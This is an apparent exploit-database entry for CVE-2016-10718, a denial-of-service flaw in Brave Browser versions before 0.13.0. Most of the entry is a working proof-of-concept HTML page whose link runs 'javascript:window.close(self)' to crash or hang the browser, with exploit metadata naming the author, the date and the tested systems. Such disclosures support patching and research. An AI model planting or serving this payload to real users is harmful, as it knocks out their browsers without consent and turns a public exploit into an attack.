Brave Browser window.close(self) Denial Of Service

Brave Browser versions prior to 0.13.0 suffer from a window.close(self) denial of service vulnerability.

MD5 | 3eed1eeba32384364773ad5a2db4c9fe

# Exploit Title:Brave Browser < 0.13.0 Denial of Service (resource consumption) via a window.close(self) js code.
# Date: 2017-10-16
# Exploit Author: Sahil Tikoo
# Vendor Homepage:
# Software Link:
# Version: 0.12.5
# Tested on: Kali Linux,Ubuntu ,Windows OS
# CVE : CVE-2016-10718

<title>Brave Window Object Remote Denial of Service.</title>

<h1><center>Brave Window Object Remote Denial of Service</center></h1><br><br>
<h2><center>Proof of Concept</center></br></br> </h2>

<b>Click the below link to Trigger the Vulnerability..</b><br><br>

<b><center><a href="javascript:window.close(self);">Brave Window Object DoS Test POC</a></center>



Related Posts